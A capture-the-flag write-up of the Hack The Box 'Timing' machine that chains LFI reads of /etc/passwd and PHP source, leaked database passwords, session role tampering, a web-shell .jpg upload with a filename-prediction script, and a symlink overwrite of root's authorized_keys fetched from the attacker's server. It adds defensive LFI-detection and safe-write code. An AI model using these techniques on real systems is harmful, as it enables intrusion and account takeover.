Target: http://10.10.11.135/image.php?FUZZ=/etc/passwd
Total requests: 2588
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000360: 200 0 L 3 W 25 Ch "img"
Total time: 8.155825
Processed Requests: 2588
Filtered Requests: 2587
Requests/sec.: 317.3192
Found the parameter. Let’s check whether it has an LFI or not.
┌─[puck@parrot-lt]─[~/htb/timing]
└──╼ $curl http://10.10.11.135/image.php?img=/etc/passwd | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--100 25 100 25 0 0 137 0 --:--:-- --:--:-- --:--:-- 137
Hacking attempt detected!
And it says hacking attempt detected!
Let’s use the PHP base64 filter wrapper to check whether it’s still the same scenario.
http://10.10.11.135/image.php?img=php://filter/convert.base64-decoder/resource=/etc/passwd
And it works!
┌─[puck@parrot-lt]─[~/htb/timing]
└──╼ $curl http://10.10.11.135/image.php?img=php://filter/convert.base64-decoder/resource=/etc/passwd | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--100 1614 100 1614 0 0 8819 0 --:--:-- --:--:-- --:--:-- 8819
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
x:4:65534:sync:/bin:/bin/sync
--snip--
pollinate:x:109:1::/var/cache/pollinate:/bin/
false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111:114:MySQL
Server,,,:/nonexistent:/bin/false aaron:x:1000:1000:aaron:/home/aaron:/bin/bash
┌─[puck@parrot-lt]─[~/htb/timing]
└──╼ $
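The check in image.php rejected the bare path but let the php://filter form through. As an added detection example, not part of the writeup, the following Python snippet scans Apache access-log lines for file parameters that carry a stream wrapper, traversal, an absolute path or a .php source read, judged after full URL decoding so encoding cannot hide the payload; the log lines are constructed for the example.

```python
#!/usr/bin/env python3
"""Flag LFI-style requests in Apache combined-format access logs.

Added example, not from the writeup. The image.php check above rejected a raw
"/etc/passwd" but let "php://filter/.../resource=/etc/passwd" through, so this
detector inspects every decoded query value and reports stream wrappers,
traversal, absolute paths and reads of .php source files.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log: ip ident user [time] "METHOD target PROTO" status size ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
_WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)  # php://, data://, expect:// ...
_TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def full_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double encoding (%252e%252e) cannot hide a payload."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value: str) -> List[str]:
    """Return the reasons a single query value looks like file inclusion (empty if benign)."""
    v = full_decode(value)
    reasons: List[str] = []
    if _WRAPPER_RE.match(v):
        reasons.append("wrapper:" + v.split("://", 1)[0].lower())
    if _TRAVERSAL_RE.search(v):
        reasons.append("traversal")
    if v.startswith("/"):
        reasons.append("absolute-path")
    # php://filter reads are typically aimed at the application's own source
    target = v.rsplit("resource=", 1)[-1]
    if target.lower().endswith(".php"):
        reasons.append("php-source-read")
    return reasons


def scan(log_lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per suspicious (request, parameter) pair."""
    findings: List[Dict[str, object]] = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                findings.append({
                    "ip": m.group("ip"), "path": parts.path, "param": name,
                    "value": full_decode(value), "reasons": reasons,
                })
    return findings


# Constructed log lines mirroring the requests made above (not a real server log).
SAMPLE_LOG = [
    '10.10.14.116 - - [21/Dec/2021:23:40:01 -0600] "GET /image.php?img=images/user-icon.png HTTP/1.1" 200 3175 "-" "curl/7.74.0"',
    '10.10.14.116 - - [21/Dec/2021:23:41:10 -0600] "GET /image.php?img=/etc/passwd HTTP/1.1" 200 25 "-" "curl/7.74.0"',
    '10.10.14.116 - - [21/Dec/2021:23:42:33 -0600] "GET /image.php?img=php://filter/convert.base64-encode/resource=login.php HTTP/1.1" 200 2764 "-" "curl/7.74.0"',
    '10.10.14.116 - - [21/Dec/2021:23:43:05 -0600] "GET /image.php?img=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 25 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}={f['value']!r} -> {', '.join(f['reasons'])}")
```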
We found the user aaron inside the /etc/passwd file.
Let’s check the login.php file with the LFI.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=login.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2764 100 2764 0 0 15885 0 --:--:-- --:--:-- --:--:-- 15885
<?php
include "header.php";
function createTimeChannel()
{
sleep(1);
}
include "db_conn.php";
if (isset($_SESSION['userid'])){
header('Location: ./index.php');
die();
}
if (isset($_GET['login'])) {
$username = $_POST['user'];
$password = $_POST['password'];
$statement = $pdo->prepare("SELECT * FROM users WHERE username = :username");
$result = $statement->execute(array('username' => $username));
$user = $statement->fetch();
if ($user !== false) {
createTimeChannel();
if (password_verify($password, $user['password'])) {
$_SESSION['userid'] = $user['id'];
$_SESSION['role'] = $user['role'];
header('Location: ./index.php');
return;
}
}
$errorMessage = "Invalid username or password entered";
}
?>
<?php
if (isset($errorMessage)) {
?>
<div class="container-fluid">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<div class="alert alert-danger alert-dismissible fade in text-center" role="alert"><strong>
<?php echo $errorMessage; ?>
</div>
</div>
</div>
</div>
<?php
}
?>
<link rel="stylesheet" href="./css/login.css">
<div class="wrapper fadeInDown">
<div id="formContent">
<div class="fadeIn first" style="padding: 20px">
<img src="./images/user-icon.png" width="100" height="100"/>
</div>
<form action="?login=true" method="POST">
<input type="text" id="login" class="fadeIn second" name="user" placeholder="login">
<input type="text" id="password" class="fadeIn third" name="password" placeholder="password">
<input type="submit" class="fadeIn fourth" value="Log In">
</form>
<!-- todo -->
<div id="formFooter">
<a class="underlineHover" href="#">Forgot Password?</a>
</div>
</div>
</div>
<?php
include "footer.php";
If you look at the login.php file, it includes a database file called db_conn.php.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=db_conn.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 124 100 124 0 0 720 0 --:--:-- --:--:-- --:--:-- 720
<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
Got the database password, but I tried it on the login page and over SSH as aaron and nothing worked.
Let’s check the upload.php file which we found in the gobuster result.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=upload.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1360 100 1360 0 0 8095 0 --:--:-- --:--:-- --:--:-- 8095
<?php
include("admin_auth_check.php");
$upload_dir = "images/uploads/";
if (!file_exists($upload_dir)) {
mkdir($upload_dir, 0777, true);
}
$file_hash = uniqid();
$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
$target_file = $upload_dir . $file_name;
$error = "";
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
if (isset($_POST["submit"])) {
$check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
if ($check === false) {
$error = "Invalid file";
}
}
// Check if file already exists
if (file_exists($target_file)) {
$error = "Sorry, file already exists.";
}
if ($imageFileType != "jpg") {
$error = "This extension is not allowed.";
}
if (empty($error)) {
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "The file has been uploaded.";
} else {
echo "Error: There was an error uploading your file.";
}
} else {
echo "Error: " . $error;
}
?>
Before uploading, it runs the check in admin_auth_check.php; let’s check that file first.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=admin_auth_check.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 268 100 268 0 0 1558 0 --:--:-- --:--:-- --:--:-- 1549
<?php
include_once "auth_check.php";
if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
echo "No permission to access this panel!";
header('Location: ./index.php');
die();
}
?>
It checks whether our session role id is equal to 1; if not, it redirects to index.php.
But the question is, what are the username and password for the login page? After some time I tried the username aaron with the password aaron, and it worked.
It says user 2, but we need our role id = 1. To find a way, let’s check the edit profile tab.
Let’s check the source code of profile.php with the LFI.
It submits the form with the help of JS, sending the form data to profile_update.php.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=js/profile.js | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 852 100 852 0 0 5011 0 --:--:-- --:--:-- --:--:-- 5041
function updateProfile() {
var xml = new XMLHttpRequest();
xml.onreadystatechange = function () {
if (xml.readyState == 4 && xml.status == 200) {
document.getElementById("alert-profile-update").style.display = "block"
}
};
xml.open("POST", "profile_update.php", true);
xml.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xml.send("firstName=" + document.getElementById("firstName").value + "&lastName=" + document.getElementById("lastName").value + "&email=" + document.getElementById("email").value + "&company=" + document.getElementById("company").value);
}
Let’s check the profile_update.php file.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=profile_update.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2320 100 2320 0 0 12888 0 --:--:-- --:--:-- --:--:-- 12888
<?php
include "auth_check.php";
$error = "";
if (empty($_POST['firstName'])) {
$error = 'First Name is required.';
} else if (empty($_POST['lastName'])) {
$error = 'Last Name is required.';
} else if (empty($_POST['email'])) {
$error = 'Email is required.';
} else if (empty($_POST['company'])) {
$error = 'Company is required.';
}
if (!empty($error)) {
die("Error updating profile, reason: " . $error);
} else {
include "db_conn.php";
$id = $_SESSION['userid'];
$statement = $pdo->prepare("SELECT * FROM users WHERE id = :id");
$result = $statement->execute(array('id' => $id));
$user = $statement->fetch();
if ($user !== false) {
ini_set('display_errors', '1');
ini_set('display_startup_errors', '1');
error_reporting(E_ALL);
$firstName = $_POST['firstName'];
$lastName = $_POST['lastName'];
$email = $_POST['email'];
$company = $_POST['company'];
$role = $user['role'];
if (isset($_POST['role'])) {
$role = $_POST['role'];
$_SESSION['role'] = $role;
}
// dont persist role
$sql = "UPDATE users SET firstName='$firstName', lastName='$lastName', email='$email', company='$company' WHERE id=$id";
$stmt = $pdo->prepare($sql);
$stmt->execute();
$statement = $pdo->prepare("SELECT * FROM users WHERE id = :id");
$result = $statement->execute(array('id' => $id));
$user = $statement->fetch();
// but return it to avoid confusion
$user['role'] = $role;
$user['6'] = $role;
echo json_encode($user, JSON_PRETTY_PRINT);
} else {
echo "No user with this id was found.";
}
}
?>
And we see that if we specify role=1 in the profile update form, it sets the session role id to 1.
Now let’s submit the form and intercept the request in Burp. Add &role=1 at the end and send the request. Now go to the home page or reload the page.
A new link appears: Admin Panel. Let’s go to that page.
We see we can upload an avatar image now; let’s check the source code of the upload.php page.
The upload process is:
1. It checks whether the file is a jpg or not.
2. It creates a file name with an md5 hash.
3. Inside the md5 function it uses '$file_hash', which is interpreted as a literal string because it is written with single quotes rather than double quotes (you can read more about that in the linked article).
4. But the time() function returns a dynamic value.
5. And then the file_name
Link: What is the difference between single-quoted and double-quoted strings in PHP?
Now, to get the name of the file, I create a Python script.
Exploit.py
import time
import hashlib

while True:
    # '$file_hash' is a literal string on the server (single quotes), so the only
    # varying input to the md5 is the current Unix time in seconds, as PHP's time() returns it
    print(f"hash = {hashlib.md5('$file_hash'.encode() + str(int(time.time())).encode()).hexdigest()}")
    time.sleep(1)
Now let’s create a jpg file which has PHP code inside it.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[/home/dedsec/Downloads/www]
└──╼ [★]$ cat dedsec.jpg
<?php system($_GET[dedsec]);?>
Before uploading the file, start the Python script first.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ python3 exploit.py
Now upload the file.
Now check every single hash generated by the Python script and try to send the request with that hash using curl.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/11c9776e30e9f474734c1aab85f1102a_dedsec.jpg&dedsec=id'
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/8303d2315176ef5e4f8d27db11525ee2_dedsec.jpg&dedsec=id'
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/dc1c96720db5b676ce16744ded6b6482_dedsec.jpg&dedsec=id'
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/b4a4cc1422fd48eb3ea2a4b14e9086e4_dedsec.jpg&dedsec=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
And we got RCE. But the problem is that we can’t get a reverse shell back because of the iptables rules.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/b4a4cc1422fd48eb3ea2a4b14e9086e4_dedsec.jpg&dedsec=ls'
admin_auth_check.php
auth_check.php
avatar_uploader.php
css
db_conn.php
footer.php
header.php
image.php
images
index.php
js
login.php
logout.php
profile.php
profile_update.php
upload.php
After some enumeration I found a zip file called source-files-backup.zip.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/b4a4cc1422fd48eb3ea2a4b14e9086e4_dedsec.jpg&dedsec=ls+-al+/opt/'
total 624
drwxr-xr-x 2 root root 4096 Dec 2 11:19 .
drwxr-xr-x 24 root root 4096 Nov 29 01:34 ..
-rw-r--r-- 1 root root 627851 Jul 20 22:36 source-files-backup.zip
I copy that zip file to /var/www/html.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/b4a4cc1422fd48eb3ea2a4b14e9086e4_dedsec.jpg&dedsec=cp+/opt/source-files-backup.zip+/var/www/html/'
Now download that zip file and unzip it.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www]
└──╼ [★]$ ls -al
total 616
drwxr-xr-x 1 root root 46 Dec 22 01:08 .
drwxr-xr-x 1 root root 54 Dec 22 01:08 ..
-rw-r--r-- 1 dedsec dedsec 627851 Dec 22 01:07 source-files-backup.zip
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www]
└──╼ [★]$ unzip source-files-backup.zip
And we see there is a .git directory; let’s dump all commits in the background.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www]
└──╼ [★]$ ls -al backup/
total 52
drwxr-xr-x 1 root root 350 Jul 20 17:34 .
drwxr-xr-x 1 root root 74 Dec 22 01:12 ..
-rw-r--r-- 1 root root 200 Jul 20 17:34 admin_auth_check.php
-rw-r--r-- 1 root root 373 Jul 20 17:34 auth_check.php
-rw-r--r-- 1 root root 1268 Jul 20 17:34 avatar_uploader.php
drwxr-xr-x 1 root root 52 Jul 20 17:34 css
-rw-r--r-- 1 root root 92 Jul 20 17:34 db_conn.php
-rw-r--r-- 1 root root 3937 Jul 20 17:34 footer.php
drwxr-xr-x 1 root root 144 Jul 20 17:35 .git
-rw-r--r-- 1 root root 1498 Jul 20 17:34 header.php
-rw-r--r-- 1 root root 507 Jul 20 17:34 image.php
drwxr-xr-x 1 root root 68 Jul 20 17:34 images
-rw-r--r-- 1 root root 188 Jul 20 17:34 index.php
drwxr-xr-x 1 root root 114 Jul 20 17:34 js
-rw-r--r-- 1 root root 2074 Jul 20 17:34 login.php
-rw-r--r-- 1 root root 113 Jul 20 17:34 logout.php
-rw-r--r-- 1 root root 3041 Jul 20 17:34 profile.php
-rw-r--r-- 1 root root 1740 Jul 20 17:34 profile_update.php
-rw-r--r-- 1 root root 984 Jul 20 17:34 upload.php
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www]
└──╼ [★]$ /opt/GitTools/Extractor/extractor.sh backup/ git_dump/
And there is a db_conn.php file which has the same password we found through the LFI.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www/backup]
└──╼ [★]$ ls -al
total 52
drwxr-xr-x 1 root root 350 Jul 20 17:34 .
drwxr-xr-x 1 root root 74 Dec 22 01:12 ..
-rw-r--r-- 1 root root 200 Jul 20 17:34 admin_auth_check.php
-rw-r--r-- 1 root root 373 Jul 20 17:34 auth_check.php
-rw-r--r-- 1 root root 1268 Jul 20 17:34 avatar_uploader.php
drwxr-xr-x 1 root root 52 Jul 20 17:34 css
-rw-r--r-- 1 root root 92 Jul 20 17:34 db_conn.php
-rw-r--r-- 1 root root 3937 Jul 20 17:34 footer.php
drwxr-xr-x 1 root root 144 Jul 20 17:35 .git
-rw-r--r-- 1 root root 1498 Jul 20 17:34 header.php
-rw-r--r-- 1 root root 507 Jul 20 17:34 image.php
drwxr-xr-x 1 root root 68 Jul 20 17:34 images
-rw-r--r-- 1 root root 188 Jul 20 17:34 index.php
drwxr-xr-x 1 root root 114 Jul 20 17:34 js
-rw-r--r-- 1 root root 2074 Jul 20 17:34 login.php
-rw-r--r-- 1 root root 113 Jul 20 17:34 logout.php
-rw-r--r-- 1 root root 3041 Jul 20 17:34 profile.php
-rw-r--r-- 1 root root 1740 Jul 20 17:34 profile_update.php
-rw-r--r-- 1 root root 984 Jul 20 17:34 upload.php
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www/backup]
└──╼ [★]$ cat db_conn.php
<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
Let’s check the git commits which we dumped in the background.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www/git_dump]
└──╼ [★]$ ls -al
total 0
drwxr-xr-x 1 root root 168 Dec 22 01:12 .
drwxr-xr-x 1 root root 74 Dec 22 01:12 ..
drwxr-xr-x 1 root root 372 Dec 22 01:12 0-16de2698b5b122c93461298eab730d00273bd83e
drwxr-xr-x 1 root root 372 Dec 22 01:12 1-e4e214696159a25c69812571c8214d2bf8736a3f
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www/git_dump]
└──╼ [★]$ cat 0-16de2698b5b122c93461298eab730d00273bd83e/db_conn.php && cat 1-e4e214696159a25c69812571c8214d2bf8736a3f/db_conn.php
<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', 'S3cr3t_unGu3ss4bl3_p422w0Rd');
And we got a different password; let’s try this password with SSH.
And we got the user.txt file.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www/git_dump]
└──╼ [★]$ ssh aaron@10.10.11.135
The authenticity of host '10.10.11.135 (10.10.11.135)' can't be established.
ECDSA key fingerprint is SHA256:w5P4pFdNqpvCcxxisM5OCJz7a6chyDUrd1JQ14k5smY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.135' (ECDSA) to the list of known hosts.
aaron@10.10.11.135's password: S3cr3t_unGu3ss4bl3_p422w0Rd
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Dec 22 07:15:18 UTC 2021
System load: 0.0 Processes: 169
Usage of /: 48.9% of 4.85GB Users logged in: 0
Memory usage: 11% IP address for eth0: 10.10.11.135
Swap usage: 0%
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
aaron@timing:~$ cat user.txt
202727f3cc3d17a1a6f04f8d9df2e333
Privilege escalation
Before running linPEAS, let’s check manually.
aaron@timing:~$ sudo -l
Matching Defaults entries for aaron on timing:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aaron may run the following commands on timing:
(ALL) NOPASSWD: /usr/bin/netutils
And we see we can execute netutils with root permission; let’s check the content of netutils.
aaron@timing:~$ cat /usr/bin/netutils
#! /bin/bash
java -jar /root/netutils.jar
aaron@timing:~$
It is running netutils.jar, which is inside the root folder, so we can’t view it.
And we see it fetches a file and places it in aaron’s home folder with root permission.
So I create a symlink named keys pointing to /root/.ssh/authorized_keys, so that when we fetch a file with the same name it overwrites the content of authorized_keys.
aaron@timing:~$ ln -s /root/.ssh/authorized_keys keys
aaron@timing:~$ ls -al
total 36
drwxr-x--x 5 aaron aaron 4096 Dec 22 08:03 .
drwxr-xr-x 3 root root 4096 Dec 2 09:55 ..
lrwxrwxrwx 1 root root 9 Oct 5 15:33 .bash_history -> /dev/null
-rw-r--r-- 1 aaron aaron 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 aaron aaron 3771 Apr 4 2018 .bashrc
drwx------ 2 aaron aaron 4096 Nov 29 01:34 .cache
drwx------ 3 aaron aaron 4096 Nov 29 01:34 .gnupg
lrwxrwxrwx 1 aaron aaron 26 Dec 22 08:03 keys -> /root/.ssh/authorized_keys
drwxrwxr-x 3 aaron aaron 4096 Nov 29 01:34 .local
-rw-r--r-- 1 aaron aaron 807 Apr 4 2018 .profile
-rw-r----- 1 root aaron 33 Dec 22 08:01 user.txt
lrwxrwxrwx 1 root root 9 Oct 5 15:33 .viminfo -> /dev/null
aaron@timing:~$
Now on the Parrot machine create an SSH key and rename or copy id_rsa.pub to keys, then:
aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url: http://10.10.14.8/keys
Initializing download: http://10.10.14.8/keys
File size: 568 bytes
Opening output file keys
Server unsupported, starting from scratch with one connection.
Starting download
Downloaded 568 byte in 0 seconds. (2.77 KB/s)
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 2
aaron@timing:~$
And open a simple HTTP server:
┌─[puck@parrot-lt]─[~/htb/timing]
└──╼ $sudo python3 -m http.server 80
[sudo] password for puck:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.135 - - [16/Jun/2022 08:50:27] "GET /keys HTTP/1.0" 200 -
10.10.11.135 - - [16/Jun/2022 08:50:27] "GET /keys HTTP/1.0" 200 -
Now enter the URL and fetch the file. After fetching it you see that no new file is created, which means it overwrote authorized_keys.
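The root cause here is a privileged downloader that opens its output name in the caller's directory and follows whatever symlink sits there. As an added example, not from the writeup and not netutils' own code, the following Python shows the safe pattern (open the directory with O_NOFOLLOW, then create the file relative to it with O_CREAT|O_EXCL|O_NOFOLLOW) and exercises it against a planted symlink in a scratch directory; the key material and file names in the demo are constructed placeholders.

```python
#!/usr/bin/env python3
"""Write a downloaded file without following a planted symlink (added example).

A privileged downloader that opens "keys" in the caller's directory will
follow "keys -> /root/.ssh/authorized_keys" and write through it. Safe pattern:
reject names with path components, open the destination directory itself with
O_NOFOLLOW, and create the output relative to that directory with
O_CREAT|O_EXCL|O_NOFOLLOW, so an existing symlink (even a dangling one) or any
existing file makes the open fail instead of being written through.
"""
import os
import tempfile
from typing import Dict


def safe_save(dest_dir: str, name: str, data: bytes) -> str:
    """Create dest_dir/name atomically; refuses symlinks, existing files and path components."""
    if not name or name in (".", "..") or "/" in name or "\\" in name or "\x00" in name:
        raise ValueError(f"refusing output name {name!r}")
    # Open the directory without following a symlink in its place and anchor every later
    # operation on that descriptor, so a concurrent rename cannot redirect the write.
    dir_fd = os.open(dest_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
        # EEXIST if anything, including a dangling symlink, already has this name
        fd = os.open(name, flags, 0o644, dir_fd=dir_fd)
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
    finally:
        os.close(dir_fd)
    return os.path.join(dest_dir, name)


def demo() -> Dict[str, object]:
    """Exercise safe_save against a planted symlink in a scratch directory; returns what happened."""
    result: Dict[str, object] = {}
    with tempfile.TemporaryDirectory() as tmp:
        # Stand-in for /root/.ssh/authorized_keys with a constructed placeholder key.
        victim = os.path.join(tmp, "victim_authorized_keys")
        with open(victim, "wb") as fh:
            fh.write(b"ssh-ed25519 AAAA...original-placeholder... root@box\n")
        # The planted "keys -> authorized_keys" link from the writeup.
        os.symlink(victim, os.path.join(tmp, "keys"))

        try:
            safe_save(tmp, "keys", b"ssh-ed25519 AAAA...attacker-placeholder...\n")
            result["symlink_write"] = "written"
        except FileExistsError:
            result["symlink_write"] = "refused"
        with open(victim, "rb") as fh:
            result["victim_intact"] = fh.read().startswith(b"ssh-ed25519 AAAA...original")

        try:
            safe_save(tmp, "../keys", b"x")
            result["traversal_name"] = "written"
        except ValueError:
            result["traversal_name"] = "refused"

        fresh = safe_save(tmp, "fresh.txt", b"hello")
        with open(fresh, "rb") as fh:
            result["fresh_content"] = fh.read()
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The same tool should also drop to the invoking user's uid before writing (sudo exposes it as SUDO_UID), so that even a bypass of the name checks cannot touch root-owned files.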
Now let’s log in with our id_rsa and get the root.txt file.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/.ssh]
└──╼ [★]$ ssh -i id_rsa root@10.10.11.135
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Dec 22 08:06:31 UTC 2021
System load: 0.1 Processes: 203
Usage of /: 48.7% of 4.85GB Users logged in: 1
Memory usage: 10% IP address for eth0: 10.10.11.135
Swap usage: 0%
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Dec 7 12:08:29 2021
root@timing:~# id
uid=0(root) gid=0(root) groups=0(root)
root@timing:~# cat root.txt
4a2e253435e9918b37745bf27f4e6183
And we pwned it …….
root@timing:~# cat /etc/iptables/rules.v4
# Generated by iptables-save v1.6.1 on Tue Oct 5 15:25:56 2021
*filter
:INPUT ACCEPT [31:2080]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:chk_apache_user - [0:0]
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -m owner --uid-owner 33 -j chk_apache_user
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -m owner --uid-owner 33 -j chk_apache_user
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -m owner --uid-owner 33 -j chk_apache_user
-A chk_apache_user -j REJECT --reject-with icmp-port-unreachable
-A chk_apache_user -j REJECT --reject-with icmp-port-unreachable
-A chk_apache_user -j REJECT --reject-with icmp-port-unreachable
COMMIT
# Completed on Tue Oct 5 15:25:56 2021
root@timing:~#
root@timing:~# cat /etc/iptables/rules.v6
# Generated by ip6tables-save v1.6.1 on Tue Oct 5 15:25:56 2021
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [24:1536]
COMMIT
# Completed on Tue Oct 5 15:25:56 2021
root@timing:~#
root@timing:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
--snip--
#
# m h dom mon dow command
*/5 * * * * /usr/bin/find /var/www/html/images/uploads -iname '*.zip' -mmin +3 -exec /bin/rm -f {} +
root@timing:~#
If you liked the writeup, support a student to get the OSCP cert:
Donation for OSCP
